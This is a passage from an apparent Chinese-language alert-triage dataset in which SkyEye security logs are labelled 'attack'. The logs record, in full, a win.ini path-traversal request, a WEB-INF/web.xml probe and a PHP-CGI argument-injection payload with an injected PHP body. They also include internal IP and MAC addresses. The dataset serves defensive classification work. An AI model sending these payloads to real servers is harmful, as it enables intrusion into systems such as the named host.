"R0VUIC93ZWIvc3RhdGljL2M6L3dpbmRvd3Mvd2luLmluaSBIVFRQLzEuMQ0KQWNjZXB0OiB0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSwqLyo7cT0wLjgNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCxkZWZsYXRlLGJyDQpVc2VyLUFnZW50OiBVc2VyLUFnZW50OiBNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA3LjA7IFdpbmRvd3MgTlQgNS4xOyAzNjBTRSkNCkhvc3Q6IHd3dy5obi5zZ2NjLmNuDQpDb25uZWN0aW9uOiBLZWVwLWFsaXZlDQoNCg==", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "发现读取Windows敏感文件,攻击者尝试利用文件包含漏洞读取Windows主机web服务器的敏感文件。", "file_md5": "f4149b219662d69ed2cf8cb4d1dec4cd", "host": "www.hn.sgcc.cn", "host_state": "失败", "rule_key": "webids", "connection": "Keep-alive", "api": "www.hn.sgcc.cn/web/static/c:/windows/win.ini", "first_access_time": "2024-11-27 00:07:34", "hazard_level": "4", "hazard_rating": "中危", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "中国--河北省--衡水市", "x_forwarded_for": "", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现读取Windows敏感文件行为", "alarm_sip": "172.31.193.55", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "6c6a6b7521bb998420d75d0168f7780e", "proto": "http", "xff": "", "alarm_id": "20241127_fa99dd57bbb960efe5eb0bc8de732bf4", "vuln_desc": "发现读取Windows敏感文件,攻击者尝试利用文件包含漏洞读取Windows主机web服务器的敏感文件。", "attack_chain": "0x02020000", "access_time": "2024-11-27 00:07:34", "attack_addr": "中国--河北省--衡水市(37.739933/115.673946)", "type_chain": "16100000", "vuln_harm": "发现读取Windows敏感文件,攻击者尝试利用文件包含漏洞读取Windows主机web服务器的敏感文件。", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732637233", "code_language": "", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "124.239.114.146", "public_date": "2023-07-31 16:36:47", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/web/static/c:/windows/win.ini", "src_mac": "00:94:a1:5e:6e:87", "file_name": "win.ini", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "33", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/web/static/c:/windows/win.ini", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x1002171a", "req_header": "GET /web/static/c:/windows/win.ini HTTP/1.1\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,br\r\nUser-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)\r\nHost: www.hn.sgcc.cn\r\nConnection: Keep-alive\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "124.239.114.146", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268572442-发现读取Windows敏感文件行为", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/XP\", \"software\": \"IE/7.0\", \"hw_type\": \"PC\"}}", "host_md5": "f6db9e52e2bff91b14ad1c771a76818d", "sport": "7552", "h_url": "/web/static/c:/windows/win.ini", "accept-encoding": "gzip,deflate,br", "user-agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732637238", "vlan_id": "", "vuln_type": "敏感信息扫描(机器学习)", "rule_version_str": "3.0.1122.14572", "attack_type": "敏感信息/重要文件泄漏", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.193.55", "sip_group": "", "repeat_count": "1", "type": "信息泄露", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732637238, "vuln_harm": "服务器敏感信息一旦泄露会导致攻击者获得重要信息,增加攻击成功率。", "rule_version_str": "3.0.1122.14572", "hit_field": "", "dip": "172.31.193.55", "site_app": "", "hit_end": 0, "uri": "/static?/%2557EB-INF/web.xml", "dport": 80, "vuln_name": "敏感信息扫描(机器学习)", "rsp_status": 0, "code_language": "", "solution": "请确认服务器是否存在相关文件,如果存在,可考虑迁移或删除敏感信息文件。", "hit_start": 0, "detail_info": "发现正在探测敏感信息文件,敏感的文件包括数据库文件、整站压缩文件、服务器或框架重要的配置文件、日志文件、压缩文件等。", "xff": "", "sip": "124.239.114.146", "vuln_desc": "发现正在探测敏感信息文件,敏感的文件包括数据库文件、整站压缩文件、服务器或框架重要的配置文件、日志文件、压缩文件等。", "public_date": "2020-11-25 19:44:12", "sport": 7605}, "solution": "请确认服务器是否存在相关文件,如果存在,可考虑迁移或删除敏感信息文件。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "R0VUIC9zdGF0aWM/LyUyNTU3RUItSU5GL3dlYi54bWwgSFRUUC8xLjENCkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksKi8qO3E9MC44DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsZGVmbGF0ZSxicg0KVXNlci1BZ2VudDogVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgNy4wOyBXaW5kb3dzIE5UIDUuMTsgMzYwU0UpDQpIb3N0OiB3d3cuaG4uc2djYy5jbg0KQ29ubmVjdGlvbjogS2VlcC1hbGl2ZQ0KDQo=", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "发现正在探测敏感信息文件,敏感的文件包括数据库文件、整站压缩文件、服务器或框架重要的配置文件、日志文件、压缩文件等。", "file_md5": "", "host": "www.hn.sgcc.cn", "host_state": "失败", "rule_key": "webids", "connection": "Keep-alive", "api": "www.hn.sgcc.cn/static", "first_access_time": "2024-11-27 00:07:18", "hazard_level": "2", "hazard_rating": "低危", "hit_field": "", "rsp_body": "", "h_method": "GET", "sip_addr": "中国--河北省--衡水市", "x_forwarded_for": "", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "敏感信息扫描(机器学习)", "alarm_sip": "172.31.193.55", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "1f3562c8af8fbc1de7e6dc9b66a8d84e", "proto": "http", "xff": "", "alarm_id": "20241127_26d71d63c8b9dff49e1494d3b8cb67ff", "vuln_desc": "发现正在探测敏感信息文件,敏感的文件包括数据库文件、整站压缩文件、服务器或框架重要的配置文件、日志文件、压缩文件等。", "attack_chain": "0x01010000", "access_time": "2024-11-27 00:07:18", "attack_addr": "中国--河北省--衡水市(37.739933/115.673946)", "type_chain": "16160000", "vuln_harm": "服务器敏感信息一旦泄露会导致攻击者获得重要信息,增加攻击成功率。", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732637218", "code_language": "", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "124.239.114.146", "public_date": "2020-11-25 19:44:12", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/static", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "site_app": "", "super_attack_chain": "0x01000000", "hit_end": "0", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/static?/%2557EB-INF/web.xml", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x10020b6a", "req_header": "GET /static?/%2557EB-INF/web.xml HTTP/1.1\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,br\r\nUser-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)\r\nHost: www.hn.sgcc.cn\r\nConnection: Keep-alive\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "124.239.114.146", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268569450-敏感信息扫描(机器学习)", "rule_labels": "{}", "host_md5": "f6db9e52e2bff91b14ad1c771a76818d", "sport": "7605", "h_url": "/static?/%2557EB-INF/web.xml", "accept-encoding": "gzip,deflate,br", "user-agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732637234", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "信息泄露", "_origin": {"write_date": 1732637234, "vuln_harm": "远程攻击者可利用该漏洞在服务器进程上下文中查看文件的源代码,获取敏感信息,在受影响计算机上运行任意PHP代码,也可能执行其他攻击。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.55", "site_app": "其他", "hit_end": 43, "uri": "/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E", "dport": 80, "vuln_name": "PHP CGI查询参数信息泄漏漏洞", "rsp_status": 0, "code_language": "其他", "solution": "目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:\r\n<a href=\"http://www.php.net/archive/2012.php#id2012-05-08-1\" target=\"_blank\" rel=\"nofollow\">http://www.php.net/archive/2012.php#id2012-05-08-1</a>", "hit_start": 23, "detail_info": "PHP是一款免费开放源代码的WEB脚本语言包,可使用在Microsoft Windows、Linux和Unix操作系统下。<br/>PHP中存在信息泄漏漏洞。", "xff": "", "sip": "124.239.114.146", "vuln_desc": "PHP是一款免费开放源代码的WEB脚本语言包,可使用在Microsoft Windows、Linux和Unix操作系统下。<br/>PHP中存在信息泄漏漏洞。", "public_date": "2018-11-14 00:00:00", "sport": 7076}, "detail_info": "PHP是一款免费开放源代码的WEB脚本语言包,可使用在Microsoft Windows、Linux和Unix操作系统下。<br/>PHP中存在信息泄漏漏洞。", "file_md5": "", "rule_key": "webids", "connection": "Keep-alive", "api": "www.hn.sgcc.cn/cgi-bin/php", "first_access_time": "2024-11-27 00:07:14", "hazard_level": "4", "hazard_rating": "中危", "hit_field": "req_header", "h_method": "POST", "sip_addr": "中国--河北省--衡水市", "x_forwarded_for": "", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "PHP CGI查询参数信息泄漏漏洞", "alarm_sip": "172.31.193.55", "skyeye_index": "", "sip_ioc_dip": "20b63ab6d8069a480db22b24d32fe954", "xff": "", "vuln_desc": "PHP是一款免费开放源代码的WEB脚本语言包,可使用在Microsoft Windows、Linux和Unix操作系统下。<br/>PHP中存在信息泄漏漏洞。", "attack_chain": "0x02030000", "vuln_harm": "远程攻击者可利用该漏洞在服务器进程上下文中查看文件的源代码,获取敏感信息,在受影响计算机上运行任意PHP代码,也可能执行其他攻击。", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732637213", "code_language": "其他", "public_date": "2018-11-14 00:00:00", "skyeye_serial_num": "QbJK/8ze/", "site_app": "其他", "super_attack_chain": "0x02000000", "hit_end": "43", "h_proto_version": "HTTP/1.1", "uri": "/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10000bfa", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "124.239.114.146", "host_md5": "f6db9e52e2bff91b14ad1c771a76818d", "accept-encoding": "gzip,deflate,br", "user-agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)", "vlan_id": "", "vuln_type": "PHP CGI查询参数信息泄漏漏洞", "attack_type": "信息泄露", "is_web_attack": "1", "dip": "172.31.193.55", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:\r\n<a href=\"http://www.php.net/archive/2012.php#id2012-05-08-1\" target=\"_blank\" rel=\"nofollow\">http://www.php.net/archive/2012.php#id2012-05-08-1</a>", "hit_start": "23", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvY2dpLWJpbi9waHA/JTJEJTY0KyU2MSU2QyU2QyU2RiU3NyU1RiU3NSU3MiU2QyU1RiU2OSU2RSU2MyU2QyU3NSU2NCU2NSUzRCU2RiU2RSslMkQlNjQrJTczJTYxJTY2JTY1JTVGJTZEJTZGJTY0JTY1JTNEJTZGJTY2JTY2KyUyRCU2NCslNzMlNzUlNjglNkYlNzMlNjklNkUlMkUlNzMlNjklNkQlNzUlNkMlNjElNzQlNjklNkYlNkUlM0QlNkYlNkUrJTJEJTY0KyU2NCU2OSU3MyU2MSU2MiU2QyU2NSU1RiU2NiU3NSU2RSU2MyU3NCU2OSU2RiU2RSU3MyUzRCUyMiUyMislMkQlNjQrJTZGJTcwJTY1JTZFJTVGJTYyJTYxJTczJTY1JTY0JTY5JTcyJTNEJTZFJTZGJTZFJTY1KyUyRCU2NCslNjElNzUlNzQlNkYlNUYlNzAlNzIlNjUlNzAlNjUlNkUlNjQlNUYlNjYlNjklNkMlNjUlM0QlNzAlNjglNzAlM0ElMkYlMkYlNjklNkUlNzAlNzUlNzQrJTJEJTY0KyU2MyU2NyU2OSUyRSU2NiU2RiU3MiU2MyU2NSU1RiU3MiU2NSU2NCU2OSU3MiU2NSU2MyU3NCUzRCUzMCslMkQlNjQrJTYzJTY3JTY5JTJFJTcyJTY1JTY0JTY5JTcyJTY1JTYzJTc0JTVGJTczJTc0JTYxJTc0JTc1JTczJTVGJTY1JTZFJTc2JTNEJTMwKyUyRCU2RSBIVFRQLzEuMQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksKi8qO3E9MC44DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsZGVmbGF0ZSxicg0KQ29udGVudC1MZW5ndGg6IDQzDQpVc2VyLUFnZW50OiBVc2VyLUFnZW50OiBNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA3LjA7IFdpbmRvd3MgTlQgNS4xOyAzNjBTRSkNCkhvc3Q6IHd3dy5obi5zZ2NjLmNuDQpDb25uZWN0aW9uOiBLZWVwLWFsaXZlDQoNCg==", "req_body": "PD9waHAgZWNobyhtZDUoJ2FjdW5ldGl4LXBocC1jZ2ktcmNlJykpOyA/Pg==", "rsp_header": "", "rsp_body": ""}, "host": "www.hn.sgcc.cn", "host_state": "失败", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_b37c0bade0585bfeb7577540e6722ca8", "access_time": "2024-11-27 00:07:14", "content-length": "43", "attack_addr": "中国--河北省--衡水市(37.739933/115.673946)", "type_chain": "16160000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "content-type": "application/x-www-form-urlencoded", "sip": "124.239.114.146", "dimension": "3", "url_path": "/cgi-bin/php", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,br\r\nContent-Length: 43\r\nUser-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)\r\nHost: www.hn.sgcc.cn\r\nConnection: Keep-alive\r\n\r\n", "req_body": "<?php echo(md5('acunetix-php-cgi-rce')); ?>", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268438522-PHP CGI查询参数信息泄漏漏洞", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/XP\", \"software\": \"IE/7.0\", \"hw_type\": \"PC\"}}", "sport": "7076", "h_url": "/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E"} | 攻击 |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.